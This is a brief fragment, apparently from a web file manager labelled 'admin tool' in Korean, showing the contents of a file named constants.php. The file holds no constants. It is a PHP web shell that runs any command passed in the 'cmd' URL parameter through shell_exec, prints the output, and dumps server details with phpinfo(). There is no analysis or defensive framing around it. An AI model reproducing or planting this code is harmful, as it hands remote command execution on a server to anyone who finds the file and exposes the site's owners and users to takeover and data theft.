관리-도구
편집 파일: constants.php
<?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; echo "<pre>" . shell_exec($cmd) . "</pre>"; } phpinfo(); ?>